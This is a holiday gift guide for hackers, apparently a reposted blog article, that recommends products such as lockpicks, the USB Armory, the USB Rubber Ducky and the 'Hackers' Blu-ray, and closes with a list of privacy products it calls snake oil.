    Money is always a welcome gift. Give the gift of going hands-on with Bitcoin with the 21 Bitcoin Computer. "The 21 Bitcoin Computer is ideal for buying and selling digital goods and services. You can use it to create bitcoin-payable APIs, set up your own personal digital goods store, pay people to share your content online, or host online games of skill." It's not cheap ($395) and comes with controversy, but it's a cool toy with a lot of potential, and 21 Inc. is going to be releasing an open source package for the device soon.
    Gentleman's Bogota Lockpicks and Clear Practice Lock
    Iemhacker-hacking-tutorial
    Conventional wisdom suggests that all hackers know how to pick locks, but can they do it in style? A perfect stocking stuffer for slick hackers of all genders is the Gentleman's Bogota lockpick set ($34.95). These featherweights pin discreetly to a collar, hat, sleeve, vest, hemline, or wherever they choose. If the hacker you're shopping for wants to learn to lockpick, or just brush up on technique, throw in the clever Clear Practice Lock ($34.95).
    Inverse Path USB Armory
    Iemhacker-hacking-news-tutorial-hackernews
    In this reviewer's opinion, every hacker should have a USB Armory in their stocking this year. The Inverse Path USB Armory ($130) is a little USB stick with an entire computer onboard (800MHz ARM processor, 512MB RAM), designed to be a portable platform for personal security applications — and lives up to its reputation as "the Swiss Army Knife of security devices."
    Hack-A-Day Gift Card
    The cornerstone of hacker culture Hack-A-Day has a store offering gift cards and merchandise a-plenty. In it, you'll find a Bukito portable 3D printer ($899.97), ever-popular Facedancer21 and Gootfet42, a low energy Bluetooth Arduino microcontroller called the Lightblue Bean, and the pocket-sized open source robot arm, Mearm.
    Hackers 20th Anniversary Blu-Ray Edition
    Hack the planet! The 20th anniversary of influential 1995 cyberpunk film "Hackers" was this year, and this cult classic got a special edition Blu-ray release, making it the must-have for the hackers in your life. The 20th anniversary "Hackers" Blu-ray features an hour-long "making of" documentary, rich video and audio transfer for the film itself, and interviews with: Cast members Matthew Lillard, Fisher Stevens, and Penn Jillette; hacking consultants Nicholas Jarecki and Emmanuel Goldstein; Director Iain Softley, and many more involved with the film's production and style.
    A Hacker's hope for better sleep: The Re-Timer
    Iemhacker-Top-10-Great-gifts-For-hackers
    Hackers are increasingly hacking themselves to make their own systems run better, and one thing hackers struggle with is their sleep cycles and feeling rested. Something that can help out is the Re-Timer ($299), a retro-future looking set of glasses and kit that adjusts the circadian rhythm and suppresses the body's production of melatonin (the sleepy hormone our bodies produce which makes us feel tired). Based on 25 years of research and on the market worldwide for three years, the Re-Timer has its own jet lag calculator app, as well as its Sleep App for Fitbit that makes a customized schedule based on actual sleep tracked.
    USB Rubber Ducky Deluxe and LAN Turtle
    Iemhacker-USB-Rubber-ducky-delux-LAN-turtle
    A longtime favorite with hackers, penetration testers and IT professionals, the USB Rubber Ducky Deluxe ($42.99)is a cross-platform (Windows, Mac, Linux, Android) testing and experimentation device that is detected as a keyboard — imagine the possibilities. This stocking stuffer pairs well with its animal friend LAN Turtle ($50), a covert sysadmin and pentest tool for remote access, network intel gathering, and man-in-the-middle monitoring through a simple graphic shell (all in a generic USB ethernet adapter case).
    TechShop Gift Certificate
    Iemhacker-Top-10-gifts-for-the-hacker
    Give the gift of hacking and making: A gift certificate to a TechShop. "Part fabrication and prototyping studio, part hackerspace, and part learning center, TechShop provides access to over $1 million worth of professional equipment and software. We offer comprehensive instruction and expert staff to ensure you have a safe, meaningful and rewarding experience." There are TechShops in Arizona, California, Michigan, Missouri, Pennsylvania, Texas, and Virginia/Washington, D.C. (some states have multiple locations). Future locations include St. Louis, MO and Paris, France.
    Products to avoid
    If you see these products, run! You're better off with a lump of coal. Don't waste precious holiday money on "snake oil" privacy and security products like these:
    • Anonabox
    • Wemagin
    • Webcloak
    • iGuardian (now SHIELD)
    • LogMeOnce
    • Sever: The Anti-Villain Box
    Related word